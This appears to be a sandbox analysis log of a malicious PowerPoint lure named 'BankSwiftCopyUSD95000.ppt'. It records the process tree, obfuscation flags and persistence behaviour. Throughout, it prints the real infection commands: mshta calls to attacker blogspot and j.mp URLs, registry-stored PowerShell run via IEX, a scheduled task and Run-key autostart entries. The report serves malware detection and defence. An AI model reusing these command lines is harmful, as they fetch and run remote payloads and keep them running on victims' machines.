Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h...............................................................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h...............................................................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h...............................................................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................d.......................................#.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................d.......................................#.......................................
Source: C:\Windows\System32\taskkill.exe	Console Write: ................................................d1......................................b...............................T.......B.........'.....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................P.z.......................%.....P.z.......%....... .....`I"........v.....................K).......Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....8.p.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j..... ..............................}..v......p.....0.................Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v......p.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....x.Y.............................}..v....0.p.....0.................Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....................................}..v....0.q.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....(.Y.............................}..v......q.....0.................Y.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............`.......\|.......G.......................................X...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............`.......\|.......h.......................................................X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............`.......\|.......q.......................................X...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............`.......\|...............................................................X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............`.......................................................X...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............`...............................................#.......................X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............`...............................................#.......X...............................

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\System32\PING.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "winword.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EXCEL.exe")
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: BankSwiftCopyUSD95000.ppt	Virustotal: Detection: 34%
Source: BankSwiftCopyUSD95000.ppt	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
Source: unknown	Process created: C:\Windows\System32\PING.EXE ping.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv
Source: unknown	Process created: C:\Windows\System32\PING.EXE ping.exe
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)\|IEX'', 0 : window.close')
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)\|IEX
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close')
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close')
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close')
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process created: C:\Windows\System32\PING.EXE ping.exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process created: C:\Windows\System32\PING.EXE ping.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)\|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary bytes = 0

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary hiddenslides = 0

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary mmclips = 0

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary notes = 0

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary presentationtarget = Widescreen

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary slides = 0

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: BankSwiftCopyUSD95000.ppt	Stream path 'VBA/Module1' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Module1			Name: Module1

Document contains an embedded VBA with many randomly named variables

Source: BankSwiftCopyUSD95000.ppt

Stream path 'VBA/Module1' : High entropy of concatenated variable names

Yara detected Costura Assembly Loader

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_0040921A pushad ; ret	12_2_0040921D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_004091D2 push eax; ret	12_2_004091D5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_05640450 push eax; mov dword ptr [esp], ecx	12_2_05640474
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01E591D2 push eax; ret	24_2_01E591D5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01E5921A pushad ; ret	24_2_01E5921D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_0571017C push 000000C3h; ret	24_2_057101A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_0571045C push eax; mov dword ptr [esp], ecx	24_2_05710474
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_05791A57 push 6E7FC374h; ret	24_2_05791A6E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_05791B93 push 6E7FC3C4h; ret	24_2_05791BAA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CEA1A8 push DCBDC399h; ret	33_2_01CEA219
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF61FF push ebx; iretd	33_2_01CF6202
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF61FD push ecx; iretd	33_2_01CF61FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF61F9 push eax; iretd	33_2_01CF61FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5DA4 push eax; retn 0074h	33_2_01CF5F59
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5557 push ebp; iretd	33_2_01CF555A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5554 push ebp; iretd	33_2_01CF5556
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5578 push eax; retn 0074h	33_2_01CF5579
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF6908 push eax; retn 0074h	33_2_01CF6BE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF2C9C push eax; retn 0074h	33_2_01CF2C9D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5098 push eax; retn 0074h	33_2_01CF5099
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF58B0 push eax; retn 0074h	33_2_01CF5D81
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF6868 push edi; iretd	33_2_01CF689E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5077 push eax; iretd	33_2_01CF507A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5075 push eax; iretd	33_2_01CF5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF43E8 push edi; iretd	33_2_01CF43D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF43E8 push edi; iretd	33_2_01CF4466
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF43E0 push edi; iretd	33_2_01CF43E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF4388 push edi; iretd	33_2_01CF43DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF4F91 push eax; iretd	33_2_01CF4F92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF4FB0 push eax; retn 0074h	33_2_01CF4FB1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5354 push eax; retn 0074h	33_2_01CF5355

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\mshta.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby

Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).meather)\|IEX"", 0 : window.close")	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://backbones1234511a.blogspot.com/p/stback1.html"", 0 : window.close")	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://startthepartyup.blogspot.com/p/backbone14.html"", 0 : window.close")	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html"", 0 : window.close")	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).phuttalylo)\|IEX"", 0 : window.close")	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')

Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\mshta.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
